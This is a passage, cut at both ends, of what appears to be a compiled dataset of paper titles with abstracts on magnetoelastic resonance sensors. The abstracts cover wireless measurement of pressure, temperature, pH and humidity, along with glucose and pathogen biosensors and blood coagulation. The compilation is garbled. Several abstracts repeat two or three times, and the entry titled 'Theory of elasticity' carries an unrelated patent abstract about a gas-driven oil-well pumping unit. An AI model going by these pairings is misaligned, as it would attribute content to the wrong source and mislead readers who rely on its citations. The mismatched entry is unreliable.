magnetoelastic ribbons enables their use as disposable sensors. This, along with the reduced volume of blood required, make the magnetoelastic sensors well suited for at-home and point-of-care testing devices. --- paper_title: Time domain characterization of oscillating sensors: Application of frequency counting to resonance frequency determination paper_content: A frequency counting technique is described for determining the resonance frequency of a transiently excited sensor; the technique is applicable to any sensor platform where the characteristic resonance frequency is the parameter of interest. The sensor is interrogated by a pulse-like excitation signal, and the resonance frequency of the sensor subsequently determined by counting the number of oscillations per time during sensor ring-down. A repetitive time domain interrogation technique is implemented to overcome the effects of sensor damping, such as that associated with mass loading, which reduces the duration of the sensor ring-down and hence the measurement resolution. The microcontroller based, transient frequency counting technique is detailed with application to the monitoring of magnetoelastic sensors [C. A. Grimes, D. Kouzoudis, and C. Mungle, Rev. Sci. Instrum. 71, 3822 (2000)], with a measurement resolution of 0.001% achieved in approximately 40 ms. --- paper_title: Frequency-domain characterization of magnetoelastic sensors: a microcontroller-based instrument for spectrum analysis using a threshold-crossing counting technique paper_content: This work presents a novel instrumentation technique for frequency-domain characterization of magnetoelastic sensors. By applying threshold-crossing counting to the transient response of a magnetoelastic sensor excited by sinusoidal pulses, frequency-domain analysis is accomplished without the necessity of using lock-in amplifier or FFT facilities as required in the conventional instrumentation techniques. The threshold-crossing counting technique is discussed and its electronic implementation described. The resulting compact and cost-effective microcontroller-based instrument is capable of frequency-domain analysis, and time-domain analysis including frequency counting and determination of the damping ratio. --- paper_title: A wireless micro-sensor for simultaneous measurement of pH, temperature, and pressure paper_content: In response to a magnetic field impulse, magnetostrictive magnetoelastic sensors mechanically vibrate. These vibrations can be detected in several ways: optically from the amplitude modulation of a reflected laser beam, acoustically using a microphone or hydrophone, and by using a pickup coil to detect the magnetic flux emitted from the sensor. Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts in response to different environmental parameters, including temperature, pressure, fluid flow velocity and mass loading, with each parameter determined in an otherwise constant environment. To extend the utility of the sensor technology in this work we report on the fabrication and application of a miniaturized array of four magnetoelastic sensors that enable the simultaneous remote query measurement of pH, temperature, and pressure from a passive, wireless platform. --- paper_title: Magnetic field tuning of the frequency–temperature response of a magnetoelastic sensor paper_content: Abstract Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts linearly in response to temperature [Sens. Actuat. A 84 (2000) 205]. In this work it is shown that over the temperature range examined, 20–60 °C, the temperature–frequency response is dependent upon the magnitude of an applied DC magnetic biasing field, and can be switched from negative, through zero, to positive. Experimental results are compared with a theoretical model that describes the effects of temperature and applied DC magnetic field on both the mechanical and magnetoelastic properties of the sensor material. --- paper_title: The frequency response of magnetoelastic sensors to stress and atmospheric pressure paper_content: Earlier work demonstrated that the characteristic resonant frequency of magnetoelastic thick-film sensors shifts linearly downwards in response to increasing atmospheric pressure. In this paper, the response mechanism is detailed and shown to be a function of both pressure and the way that the sensor is mechanically stressed. Stressing the sensor, in either the elastic or plastic regime, induces out-of-plane vibrations that act as a pressure-dependent damping force to the longitudinal sensor oscillations excited by the interrogation field. This damping force, in turn, acts to shift the resonant frequency of the magnetoelastic sensor lower in response to increasing pressure. --- paper_title: Remote query pressure measurement using magnetoelastic sensors paper_content: Two magnetostriction-based methods for measuring atmospheric pressure are presented. Each technique correlates changes in pressure with the characteristic resonant frequency of a magnetoelastic magnetostrictive thick-film sensor. In each case the sensor is monitored remotely, using an adjacently located pickup coil, without the use of physical connections to the sensor. --- paper_title: Magnetoelastic sensors in combination with nanometer-scale honeycombed thin film ceramic TiO2 for remote query measurement of humidity. paper_content: Ribbonlike magnetoelastic sensors can be considered the magnetic analog of an acoustic bell; in response to an externally applied magnetic field impulse the sensors emit magnetic flux with a characteristic resonant frequency. The magnetic flux can be detected external to the test area using a pick-up coil, enabling query remote monitoring of the sensor. The characteristic resonant frequency of a magnetoelastic sensor changes in response to mass loads. [L.D. Landau and E. M. Lifshitz, Theory of Elasticity, 3rd ed. (Pergamon, New York, 1986). p. 100].Therefore, remote query chemical sensors can be fabricated by combining the magnetoelastic sensors with a mass changing, chemically responsive layer. In this work magnetoelastic sensors are coated with humidity-sensitive thin films of ceramic, nanodimensionally porous TiO2 to make remote query humidity sensors. --- paper_title: Higher-order harmonics of a magnetically soft sensor: Application to remote query temperature measurement paper_content: This letter describes the application of magnetically soft ribbons for remote query temperature monitoring based upon amplitude changes in the higher-order harmonics emitted by the sensor in response to a magnetic interrogation signal. The harmonic-based temperature sensor is placed, or rigidly embedded since there are no moving parts, within the region of interest where it is remotely monitored using a single interrogation and detection coil. Taking the amplitude ratio between two or more different-order harmonics eliminates the effect of relative orientation between the sensor and monitoring coil, enabling wide-area monitoring. Remote query monitoring of temperature from within a concrete block is demonstrated. The wireless and passive nature of the described sensor platform makes it ideally suited for long-term monitoring applications, such as measuring the temperature inside a concrete roadway or building structure. --- paper_title: A wireless micro-sensor for simultaneous measurement of pH, temperature, and pressure paper_content: In response to a magnetic field impulse, magnetostrictive magnetoelastic sensors mechanically vibrate. These vibrations can be detected in several ways: optically from the amplitude modulation of a reflected laser beam, acoustically using a microphone or hydrophone, and by using a pickup coil to detect the magnetic flux emitted from the sensor. Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts in response to different environmental parameters, including temperature, pressure, fluid flow velocity and mass loading, with each parameter determined in an otherwise constant environment. To extend the utility of the sensor technology in this work we report on the fabrication and application of a miniaturized array of four magnetoelastic sensors that enable the simultaneous remote query measurement of pH, temperature, and pressure from a passive, wireless platform. --- paper_title: Measurement of temperature and liquid viscosity using wireless magneto-acoustic/magneto-optical sensors paper_content: Remote query magneto-acoustic and magneto-optical sensors are used to measure liquid temperature, viscosity and density. Sensors comprising magnetoelastic Metglas(R) 2826MB thick-films, alloy composition Fe/sub 40/Ni/sub 38/Mo/sub 4/B/sub 18/, oscillate in response to an externally applied, time-varying magnetic field. The sensor oscillations are strongest at the characteristic mechanical resonant frequency of the sensor. Depending upon the physical geometry and surface roughness of the magnetoelastic films, the mechanical sensor-vibrations launch an acoustic wave that can be detected remotely using a hydrophone or microphone. Furthermore, the sensor oscillations act to modulate the intensity of a laser beam reflected from the sensor surface. The sensor vibrations were optically monitored using a photo detector placed in the path of a laser beam back-scattered off the sensor ribbon. Using a Fast Fourier Transform, the signal obtained in the time-domain from acoustical or optical detectors is converted into the frequency-domain from which the resonant frequency of the sensor is determined. The resonant frequency shifts linearly with temperature and, when immersed in a liquid, with the frictional damping forces associated with liquid viscosity and density, thus allowing a remote measurement of temperature and liquid viscosity. --- paper_title: Magnetoacoustic remote query temperature and humidity sensors paper_content: In response to an externally applied time-varying magnetic field, freestanding sensors made of magnetoelastic thick or thin films mechanically oscillate. These oscillations are strongest at the characteristic resonant frequency of the sensor. Depending upon the physical geometry and the surface roughness of the magnetoelastic sensor, these mechanical deformations launch an acoustic wave that can be detected remotely from the test area by a microphone. By monitoring changes in the characteristic resonant frequency of a magnetoacoustic sensor, multiple environmental parameters can be measured. In this work we report on the application of magnetoacoustic sensors for the remote query measurement of temperature, the monitoring of phase transitions and, in combination with a humidity-responsive mass-changing Al2O3 ceramic thin film, the in situ measurement of humidity levels. --- paper_title: A wireless magnetoelastic micro-sensor array for simultaneous measurement of temperature and pressure paper_content: Magnetoelastic thick film sensors mechanically deform when subjected to a magnetic field impulse, launching elastic waves within the sensor the magnitude of which is greatest at the mechanical resonant frequency. As the sensors are magnetostrictive, the mechanical deformations launch magnetic flux that can be detected remotely. The characteristic resonant frequency of a magnetoelastic sensor, which is a function of the length, density, elasticity and Poisson's ratio of the sensor material, changes in response to temperature, pressure, ambient flow rate and, in combination with a mass changing, chemically responsive layer different analyte concentrations. By using an array of such sensors different environmental parameters can be simultaneously determined in a complex environment; we have designed and fabricated such an array for the simultaneous measurement of temperature and pressure. --- paper_title: Magnetic field tuning of the frequency–temperature response of a magnetoelastic sensor paper_content: Abstract Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts linearly in response to temperature [Sens. Actuat. A 84 (2000) 205]. In this work it is shown that over the temperature range examined, 20–60 °C, the temperature–frequency response is dependent upon the magnitude of an applied DC magnetic biasing field, and can be switched from negative, through zero, to positive. Experimental results are compared with a theoretical model that describes the effects of temperature and applied DC magnetic field on both the mechanical and magnetoelastic properties of the sensor material. --- paper_title: Theory of elasticity paper_content: A walking beam pumping unit is provided for pumping liquid from wells having gas pressure therein. The unit is driven by gas pressure from the well reciprocating the piston of a pneumatic cylinder up and down to swing the walking beam correspondingly and pump the liquid from the well. Gas under pressure is directed from the wellhead through a two-way valve to the opposite ends of the hydraulic cylinder in alternating fashion, so the piston has power strokes in opposite directions. Each power stroke, besides moving the walking beam, serves to recompress the gas used for the preceding power stroke sufficiently to inject it into the sales line. The setting of the two-way valve is controlled by a pneumatic actuator supplied with gas under pressure from the wellhead and having a thimble valve responsive to the up and down movement of the walking beam by means of adjustable stops carried thereon. The horsehead is counter-balanced by weights or by a pneumatic cylinder attached to the horsehead and actuated by movement thereof to provide counter-balancing gas pressure. In one form of the invention, the counter-balancing gas pressure is stored in a hollow skid assembly. --- paper_title: Simultaneous measurement of liquid density and viscosity using remote query magnetoelastic sensors paper_content: Earlier work [C. A. Grimes et al., Smart Mater. Struct. 8, 639, (1999)] has shown that upon immersion in liquid the resonant frequency of a magnetoelasticsensor shifts linearly in response to the square root of the liquid density and viscosity product. It is shown that comparison between a pair of magnetoelasticsensors with different degrees of surface roughness can be used to simultaneously determine the liquid density and viscosity. --- paper_title: Characterization of nano-dimensional thin-film elastic moduli using magnetoelastic sensors paper_content: Abstract Application of magnetoelastic thick-film sensors to the measurement of thin-film elastic moduli is described in this study. An analytical model is derived, that relates the resonant frequency of a magnetoelastic sensor to the elasticity and density of an applied thin-film. Limits of the model are analyzed, and related to experimental measurements using thin-films of silver and aluminum. For 500 nm thick-films, the measured Young’s modulus of elasticity for Al and Ag is found to be within 1.6% of standard data. Using commercially available magnetoelastic sensors, the elasticity of coatings, approximately 30 nm thick, can readily be measured. --- paper_title: A remote query magnetoelastic pH sensor. paper_content: A remote query magnetoelastic pH sensor comprised of a magnetoelastic thick-film coated with a mass-changing pH-responsive polymer is described. In response to a magnetic query field the magnetoelastic sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the attached polymer layer. As the magnetoelastic sensor is magnetostrictive the mechanical vibrations of the sensor launch magnetic flux that can be detected remotely from the sensor using a pickup coil. The pH responsive copolymer is synthesized from 20 mol% of acrylic acid and 80 mol% of iso-octyl acrylate and then deposited onto a magnetoelastic film by dip-coating. For a 1 micrometer polymer coating upon a 30 micrometer thick Metglas [The Metglas alloys are a registered trademark of Honeywell Corporation. For product information see: http://www.electronicmaterials.com:80/businesses/sem/amorph/page5_1_2.htm.] alloy 2826MB magnetoelastic film between pH 5 and 9 the change in resonant frequency is linear, approximately 285 Hz/pH or 0.6%/pH. The addition of 10 mmol/l of KCl to the test solution decreases the sensitivity of the polymer approximately 4%. --- paper_title: Magnetoelastic sensors in combination with nanometer-scale honeycombed thin film ceramic TiO2 for remote query measurement of humidity. paper_content: Ribbonlike magnetoelastic sensors can be considered the magnetic analog of an acoustic bell; in response to an externally applied magnetic field impulse the sensors emit magnetic flux with a characteristic resonant frequency. The magnetic flux can be detected external to the test area using a pick-up coil, enabling query remote monitoring of the sensor. The characteristic resonant frequency of a magnetoelastic sensor changes in response to mass loads. [L.D. Landau and E. M. Lifshitz, Theory of Elasticity, 3rd ed. (Pergamon, New York, 1986). p. 100].Therefore, remote query chemical sensors can be fabricated by combining the magnetoelastic sensors with a mass changing, chemically responsive layer. In this work magnetoelastic sensors are coated with humidity-sensitive thin films of ceramic, nanodimensionally porous TiO2 to make remote query humidity sensors. --- paper_title: Magnetoacoustic remote query temperature and humidity sensors paper_content: In response to an externally applied time-varying magnetic field, freestanding sensors made of magnetoelastic thick or thin films mechanically oscillate. These oscillations are strongest at the characteristic resonant frequency of the sensor. Depending upon the physical geometry and the surface roughness of the magnetoelastic sensor, these mechanical deformations launch an acoustic wave that can be detected remotely from the test area by a microphone. By monitoring changes in the characteristic resonant frequency of a magnetoacoustic sensor, multiple environmental parameters can be measured. In this work we report on the application of magnetoacoustic sensors for the remote query measurement of temperature, the monitoring of phase transitions and, in combination with a humidity-responsive mass-changing Al2O3 ceramic thin film, the in situ measurement of humidity levels. --- paper_title: A wireless, remote query ammonia sensor. paper_content: Abstract This paper presents a wireless, remote query ammonia sensor comprised of a free-standing magnetoelastic thick-film coated with a polymer, poly(acrylic acid-co-isooctylacrylate), that changes mass in response to atmospheric ammonia concentration. The mass of the polymer layer modulates the resonant frequency the ferromagnetic magnetoelastic substrate, hence by monitoring the frequency response of the sensor, atmospheric NH 3 concentration can be determined remotely, without the need for physical connections to the sensor or specific alignment requirements. The effect of copolymer composition, polymer film thickness, and relative humidity level (RH) on the sensitivity of the sensor were investigated. The sensor linearly tracks ammonia concentration below 0.8 vol.%, and tracks higher concentrations logarithmically; within the linear calibration range, a 0.02 vol.% change in NH 3 concentration can be detected. --- paper_title: Ethylene Detection Using Nanoporous PtTiO2 Coatings Applied to Magnetoelastic Thick Films paper_content: This paper reports on the use of nanoporous Pt-TiO2 thin films coated onto magnetoelastic sensors for the detection of ethylene, an important plant growth hormone. Five different metal oxide coatings, TiO2, TiO2+ZrO2, TiO2+TTCN(1,4,7-Trithiacyclononane)+Ag, SiO2+Fe, and TiO2+Pt, each having demonstrated photocatalytic activity in response to ethylene, were investigated for their ability to change mass or elasticity in response to changing ethylene concentration. Pt-TiO2 films were found to possess the highest sensitivities, and coupled with the magnetoelastic sensor platform capable of sensing ethylene levels of < 1 ppm. --- paper_title: A remote query magnetoelastic pH sensor. paper_content: A remote query magnetoelastic pH sensor comprised of a magnetoelastic thick-film coated with a mass-changing pH-responsive polymer is described. In response to a magnetic query field the magnetoelastic sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the attached polymer layer. As the magnetoelastic sensor is magnetostrictive the mechanical vibrations of the sensor launch magnetic flux that can be detected remotely from the sensor using a pickup coil. The pH responsive copolymer is synthesized from 20 mol% of acrylic acid and 80 mol% of iso-octyl acrylate and then deposited onto a magnetoelastic film by dip-coating. For a 1 micrometer polymer coating upon a 30 micrometer thick Metglas [The Metglas alloys are a registered trademark of Honeywell Corporation. For product information see: http://www.electronicmaterials.com:80/businesses/sem/amorph/page5_1_2.htm.] alloy 2826MB magnetoelastic film between pH 5 and 9 the change in resonant frequency is linear, approximately 285 Hz/pH or 0.6%/pH. The addition of 10 mmol/l of KCl to the test solution decreases the sensitivity of the polymer approximately 4%. --- paper_title: A wireless pH sensor based on the use of salt-independent micro-scale polymer spheres paper_content: Abstract Poly(vinylbenzylchloride-co-2,4,5-trichlorophenyl acrylate) (VBC-TCPA) spheres, approximately 725 nm in diameter, were prepared by dispersion polymerization then derivatized with diethanolamine to realize a mass changing pH-responsive polymer. While the pH-responsive polymer spheres are suitable for use with any mass-sensitive sensor platform, in this work, the polymer spheres are combined with magnetoelastic thick films to achieve a remote query pH sensor. The magnetoelastic pH sensors were fabricated by spin-coating the aminated polymer spheres onto the surface of a magnetoelastic ribbon. The pH response of these sensors was examined by monitoring changes in sensor resonance frequency as a function of test-solution pH. The sensors demonstrate a linear pH response from pH 3.0 to 9.0, with a change in resonance frequency f r of 0.2% f r per pH for a 1.5-μm thick polymer layer. Measurements were virtually independent of background potassium chloride concentration. --- paper_title: A wireless micro-sensor for simultaneous measurement of pH, temperature, and pressure paper_content: In response to a magnetic field impulse, magnetostrictive magnetoelastic sensors mechanically vibrate. These vibrations can be detected in several ways: optically from the amplitude modulation of a reflected laser beam, acoustically using a microphone or hydrophone, and by using a pickup coil to detect the magnetic flux emitted from the sensor. Earlier work has shown that the resonant frequency of a magnetoelastic sensor shifts in response to different environmental parameters, including temperature, pressure, fluid flow velocity and mass loading, with each parameter determined in an otherwise constant environment. To extend the utility of the sensor technology in this work we report on the fabrication and application of a miniaturized array of four magnetoelastic sensors that enable the simultaneous remote query measurement of pH, temperature, and pressure from a passive, wireless platform. --- paper_title: A wireless pH sensor using magnetoelasticity for measurement of body fluid acidity. paper_content: The determination of body fluid acidity using a wireless magnetoelastic pH-sensitive sensor is described. The sensor was fabricated by casting a layer of pH-sensitive polymer on a magnetoelastic ribbon. In response to an externally applied time-varying magnetic field, the magnetoelastic sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the pH polymer film, which varies as the film swells and shrinks in response to pH. As the magnetoelastic sensor is magnetostrictive, the mechanical vibrations of the sensor launch magnetic flux that can be detected remotely using a pickup coil. The sensor can be used for direct measurements of body fluid acidity without a pretreatment of the sample by using a filtration membrane. A reversible and linear response was obtained between pH 5.0 and 8.0 with a measurement resolution of pH 0.1 and a slope of 0.2 kHz pH(-1). Since there are no physical connections between the sensor and the instrument, the sensor can be applied to in vivo and in situ monitoring of the physiological pH and its fluctuations. --- paper_title: A wireless and sensitive sensing detection of polycyclic aromatic hydrocarbons using humic acid-coated magnetic Fe3O4 nanoparticles as signal-amplifying tags paper_content: Abstract A wireless magnetoelastic-sensing device for the detection of polycyclic aromatic hydrocarbons (PAHs) with anthracene as the model target is reported using humic acid-modified magnetic Fe 3 O 4 nanoparticles (HMNPs) as signal-amplifying tags. A sandwich-type detection strategy involves the humic acid (HA)/chitosan composite self-assembled on the polyurethane-protected sensor surface and HMNPs, both of which flank the anthracene target in sequence. As the HMNPs-combined anthracene absorbs to the sensor surface, there is an increase in the mass load on the sensor, and consequently a decrease in resonance frequency. Under optimal conditions, the sensor shows a linear response to polycyclic aromatic hydrocarbons with sensitivity depending on the benzene rings. The sensor shows the largest sensitivity to benzo[ a ]pyrene due to its 5 ring with a detection limit of 3 nM. Tap water, river water and spring water were analyzed with this sensor. --- paper_title: Magnetoelastic Immunosensors: Amplified Mass Immunosorbent Assay for Detection of Escherichia coli O157:H7 paper_content: A mass-sensitive magnetoelastic immunosensor for detection of Escherichia coli O157:H7 is described, based on immobilization of affinity-purified antibodies attached to the surface of a micrometer-scale magnetoelastic cantilever. Alkaline phosphatase is used as a labeled enzyme to the anti-E. coli O157:H7 antibody, amplifying the mass change associated with the antibody−antigen binding reaction by biocatalytic precipitation of 5-bromo-4-chloro-3-indolyl phosphate in a pH 10.0 PBS solution. The detection limit of the biosensor is 102 E. coli O157:H7 cells/mL. A linear change in the resonance frequency of the biosensor was found to E. coli O157:H7 concentrations ranging from 102 to 106 cells/mL. --- paper_title: A wireless magnetoelastic biosensor for rapid detection of glucose concentrations in urine samples paper_content: Abstract A wireless magnetoelastic glucose biosensor is fabricated by co-immobilizing glucose oxidase (GOx) and catalase onto a pH-sensitive-polymer-coated magnetoelastic sensor with chitosan as a supporting substrate. The GOx-catalyzed hydrolyzation of glucose produces gluconic acid, resulting in shrinking and corresponding mass decrease in the pH-responsive polymer, and consequently the resonance frequency of the magnetoelastic sensor increasing. The glucose biosensor is applied to measurement of glucose concentrations within urine samples; the shift in resonance frequency is found proportional to the glucose concentration, with a linear response obtained between 1 mM and 15 mM. The presence of acetaminophen, lactose, saccharose and galactose do not significantly interfere with glucose detection; ascorbic acid does, as expected, however its effect can be eliminated through cross-correlation with a pH-responsive magnetoelastic reference sensor or by pre-adjusting the sample to pH 7.0. A L 9 (3 4 ) orthogonal array based on the Taguchi method is used to optimize the sensor fabrication process and to determine the key factors that affect sensor performance. Assays of 15 clinical urine samples give glucose levels that are in accordance with the results by an urine analyzer, showing the proposed sensor can be applied for glucose assay in urine. --- paper_title: Determination of glucose using bienzyme layered assembly magnetoelastic sensing device paper_content: Abstract A bienzyme layered assembly on magnetoelastic sensor, consisting of horseradish peroxidase and glucose oxidase is used to sense glucose by the horseradish peroxidase-mediated oxidation of 3,3′,5,5′-tetramethylbenzidine, by H 2 O 2 , and the formation of the insoluble product on the sensor surface. A horseradish peroxidase is used to analyze hydrogen peroxide (H 2 O 2 ) via the biocatalyzed oxidation of tetramethylbenzidine and the precipitation of the insoluble product. The glucose oxidase catalyzed oxidation of glucose produces gluconic acid and H 2 O 2 , and the generated H 2 O 2 effects the formation of the insoluble product in the presence of horseradish peroxidase. The insoluble product accumulated on the sensor surface resulting in shifts of the sensor resonance frequency which are correlated with the amount of H 2 O 2 or glucose. The biosensor response is linear in the range of glucose concentrations of 5–50 mM, with a detection limit of 2 mM at a noise level of ∼10 Hz. The biosensor is applied to determine glucose concentration in urine sample. --- paper_title: A wireless, remote query glucose biosensor based on a pH-sensitive polymer paper_content: This paper describes a wireless, remote query glucose biosensor using a ribbonlike, mass-sensitive magnetoelastic sensor as the transducer. The glucose biosensor is fabricated by first coating the magnetoelastic sensor with a pH-sensitive polymer and upon it a layer of glucose oxidase (GOx). The pH-responsive polymer swells or shrinks, thereby changing mass, respectively, in response to increasing or decreasing pH values. The GOx-catalyzed oxidation of glucose produces gluconic acid, inducing the pH-responsive polymer to shrink, which in turn decreases the polymer mass. In response to a time-varying magnetic field, a magnetoelastic sensor mechanically vibrates at a characteristic resonance frequency, the value of which inversely depends on sensor mass loading. As the magnetoelastic films are magnetostrictive, the vibrations launch magnetic flux that can be remotely detected using a pickup coil. Hence, changes in the resonance frequency of a passive magnetoelastic transducer are detected on a remote query ... --- paper_title: Measurement of Glucose Concentration in Blood Plasma Based on a Wireless Magnetoelastic Biosensor paper_content: Abstract A wireless magnetoelastic glucose biosensor in blood plasma is described, based on using a mass sensitive magnetoelastic sensor as transducer. The glucose biosensor was fabricated by coating the ribbon‐like, magnetoelastic sensor with a pH sensitive polymer and a biolayer of glucose oxidase (GOx) and catalase. The pH response polymer swells or shrinks, thereby changing sensor mass loading, respectively, in response to increase or decrease of pH values. The GOx–catalyzed oxidation of the glucose in blood plasma produces gluconic acid, resulting in the pH sensitive polymer shrinking, which in turn decreases the sensor mass loading. The results show that the proposed magnetoelastic glucose biosensor can be successfully applied to determine the concentration of glucose in blood plasma. At glucose concentration range of 2.5–20.0 mmol/l, the biosensor responses are reversible and linear, with a detection limit of 1.2 mmol/l. Since no physical connections between the sensor and the monitoring instrument... --- paper_title: A magnetoelastic bioaffinity-based sensor for avidin. paper_content: Abstract A magnetoelastic bioaffinity sensor coupled with biocatalytic precipitation is described for avidin detection. The non-specific adsorption characteristics of streptavidin on different functionalized sensor surfaces are examined. It is found that a biotinylated poly(ethylene glycol) (PEG) interface can effectively block non-specific adsorption of proteins. Coupled with the PEG immobilized sensor surface, alkaline phosphatase (AP) labeled streptavidin is used to track specific binding on the sensor. This mass-change-based signal is amplified by the accumulation on the sensor of insoluble products of 5-bromo-4-chloro-3-indolyl phosphate catalyzed by AP. The resulting mass loading on the sensor surface in turn shifts the resonance frequency of the magnetoelastic sensors, with an avidin detection limit of approximately 200 ng/ml. --- paper_title: A wireless magnetoelastic biosensor for convenient and sensitive detection of acid phosphatase paper_content: This paper describes a wireless and low-cost biosensor for the sensitive detection of acid phosphatase (ACP) using a thick-film magnetoelastic transducer. In response to an externally applied time-varying magnetic field, the magnetoelastic ribbon-like sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the attached film. As the ribbon material is magnetostrictive, the mechanical vibrations of the sensor launch magnetic flux as a return signal that can be detected remotely using a pickup coil. The measurement is based on the enzymatic hydrolysis of 5-bromo-4-chloro-3-indolyl phosphate (BCIP), producing a dimer which binds tightly to the sensor surface, resulting in a change in the sensor resonance frequency. The biosensor demonstrates a linear shift in resonance frequency with ACP concentration ranging from 1.5 to 15 U/l, with a detection limit of 1.5 U/l at a noise level of ∼20 Hz. The sensitivity achieved is comparable to spectrometry and surface acoustic wave sensors. The effect of substrate concentration and BSA immobilization are detailed. --- paper_title: A wireless magnetoelastic-sensing device for in situ evaluation of Pseudomonas aeruginosa biofilm formation paper_content: A wireless, passive magnetoelastic-sensing device is presented for the in situ, continuous, and real-time evaluation of the formation of Pseudomonas aeruginosa biofilms. The sensor, a polyurethane-coated magnetostrictive ribbon, is placed in a flowing system, and both the resonance frequency and amplitude of the sensor are wirelessly monitored through magnetic field telemetry. The sensor platform appears to be of great utility for the in situ evaluation of biofilms formation. --- paper_title: The detection of Mycobacterium tuberculosis in sputum sample based on a wireless magnetoelastic-sensing device. paper_content: This paper presents a real-time detection of Mycobacterium tuberculosis (M. TB) using a wireless magnetoelastic sensor. The sensor is fabricated by coating a magnetoelastic ribbon (Metglas 2826MB) with a polyurethane protecting film. M. TB consumes the nutrients of a liquid culture medium in growing and reproducing process, which results in properties changes (viscosity, density, elasticity, ion concentration, etc.) of the culture medium, and consequently changes in the resonance frequency of the magnetoelastic sensor. Using the described technique M. TB is quantified and sensor response is proportional to logarithmic values of the M. TB concentration from 10(4) to 10(9)cells ml(-1), with a detection limit of 10(4)cells ml(-1) at a noise level of approximately 10 Hz. The sensor can be used effectively for monitoring the bacterial growth and good results were obtained when used in sputum sample. The drug-resistance of isoniazid (INH) and rifampin (RFP) on M. TB growth in culture medium was evaluated based on this proposed method. The wireless nature of the presented device facilitates the aseptic operations. --- paper_title: Quantification of multiple bioagents with wireless, remote-query magnetoelastic microsensors paper_content: This paper presents a micromagnetoelastic sensor array for simultaneously monitoring multiple biological agents. Magnetoelastic sensors, made of low-cost amorphous ferromagnetic ribbons, are analogous and complementary to piezoelectric acoustic wave sensors, which track parameters of interest via changes in resonance behavior. Magnetoelastic sensors are excited with magnetic ac fields, and, in turn, they generate magnetic fluxes that can be detected with a sensing coil from a distance. As a result, these sensors are highly attractive, not only due to their small size and low cost, but also because of their passive and wireless nature. Magnetoelastic sensors have been applied for monitoring pressure, temperature, liquid density, and viscosity, fluid How velocity and direction, and with chemical/biological responsive coatings that change mass or elasticity, various biological and chemical agents. In this paper, we report the fabrication and application of a six-sensor array for simultaneous measurement of Escherichia coli O157:H7, staphylococcal enterotoxin B, and ricin. In addition, the sensor array also monitors temperature and pH so the measurements are independent from these two parameters --- paper_title: A staphylococcal enterotoxin B magnetoelastic immunosensor. paper_content: A magnetoelastic immunosensor for detection of staphylococcal enterotoxin B (SEB) is described. The magnetoelastic sensor is a newly developed mass/elasticity-based transducer of high sensitivity having a material cost of approximately $0.001/sensor. Affinity-purified rabbit anti-SEB antibody was covalently immobilized on magnetoelastic sensors, of dimensions 6 mm x 2 mm x 28 microm. The affinity reaction of biotin-avidin and biocatalytic precipitation are used to amplify antigen-antibody binding events on the sensor surface. Horseradish peroxidase (HRP) and alkaline phosphatase were examined as the labeled enzymes to induce biocatalytic precipitation. The alkaline phosphatase substrate, 5-bromo-4-chloro-3-indolyl phosphate (BCIP) produces a dimer, which binds tightly to the sensor surface, inducing a change in sensor resonance frequency. The biosensor demonstrates a linear shift in resonance frequency with staphylococcal enterotoxin B concentration between 0.5 and 5 ng/ml, with a detection limit of 0.5 ng/ml. --- paper_title: A remote-query sensor for predictive indication of milk spoilage paper_content: Abstract Described is application of the remote-query (wireless, passive) magnetoelastic sensor platform for direct detection and monitoring of bacterium contamination of milk within hermetically sealed containers. Specific application is made to the quantification of Staphylococcus aureus ssp. anaerobius ( S. aureus ) concentrations in milk. S. aureus growth changes milk viscosity, in turn changing the resonance frequency of the liquid immersed sensor allowing S. aureus concentrations of 10 3 to 10 7 cells ml −1 to be directly quantified. --- paper_title: Eliminating unwanted nanobubbles from hydrophobic solid/liquid interfaces: a case study using magnetoelastic sensors. paper_content: Air bubbles are known to form at the liquid/solid interface of hydrophobic materials upon immersion in a liquid (Holmberg, M.; Kdühle, A.; Garnaes, J.; Mørch, K. A.; Boisen, A. Langmuir 2003, 19, 10510-10513). In the case of gravimetric sensors, air bubbles that randomly form at the liquid-solid interface result in poor sensor-to-sensor reproducibility. Herein a superhydrophilic ZnO nanorod film is applied to the originally hydrophobic surface of a resonance-based magnetoelastic sensor. The superhydrophilic coating results in the liquid completely spreading across the surface, removing unwanted air bubbles from the liquid/sensor interface. The resonance amplitude of uncoated (bare) and ZnO-modified sensors are measured in air and then when immersed in saline solution, ethylene glycol, or bovine blood. In comparison to the bare, hydrophobic sensors, we find that the standard deviation of the resonance amplitudes of the liquid-immersed ZnO-nanorod-modified sensors decreases substantially, ranging from a 27% decrease for bovine blood to a 67% decrease for saline. The strategy of using a superhydrophilic coating can be applied to other systems having similar interfacial problems. --- paper_title: Monitoring blood coagulation with magnetoelastic sensors. paper_content: The determination of blood coagulation time is an essential part of monitoring therapeutic anticoagulants. Standard methodologies for the measurement of blood clotting time require dedicated personnel and involve blood sampling procedures. A new method based on magnetoelastic sensors has been employed for the monitoring of blood coagulation. The ribbon-like magnetoelastic sensor oscillates at a fundamental frequency, which shifts linearly in response to applied mass loads or a fixed mass load of changing elasticity. The magnetoelastic sensors emit magnetic flux, which can be detected by a remotely located pick-up coil, so that no direct physical connections are required. During blood coagulation, the viscosity of blood changes due to the formation of a soft fibrin clot. In turn, this change in viscosity shifts the characteristic resonance frequency of the magnetoelastic sensor enabling real-time continuous monitoring of this biological event. By monitoring the signal output as a function of time, a distinct blood clotting profile can be seen. The relatively low cost of the magnetoelastic ribbons enables their use as disposable sensors. This, along with the reduced volume of blood required, make the magnetoelastic sensors well suited for at-home and point-of-care testing devices. --- paper_title: The effect of TiO2 nanotubes in the enhancement of blood clotting for the control of hemorrhage. paper_content: Abstract The main biological purpose of blood coagulation is formation of an obstacle to prevent blood loss of hydraulic strength sufficient to withstand the blood pressure. The ability to rapidly stem hemorrhage in trauma patients significantly impacts their chances of survival, and hence is a subject of ongoing interest in the medical community. Herein, we report on the effect of biocompatible TiO 2 nanotubes on the clotting kinetics of whole blood. TiO 2 nanotubes 10 μm long were prepared by anodization of titanium in an electrolyte comprised of dimethyl sulfoxide and HF, then dispersed by sonication. Compared to pure blood, blood containing dispersed TiO 2 nanotubes and blood in contact with gauze pads surface-decorated with nanotubes demonstrated significantly stronger clot formation at reduced clotting times. Similar experiments using nanocrystalline TiO 2 nanoparticles showed comparatively weaker clot strengths and increased clotting times. The TiO 2 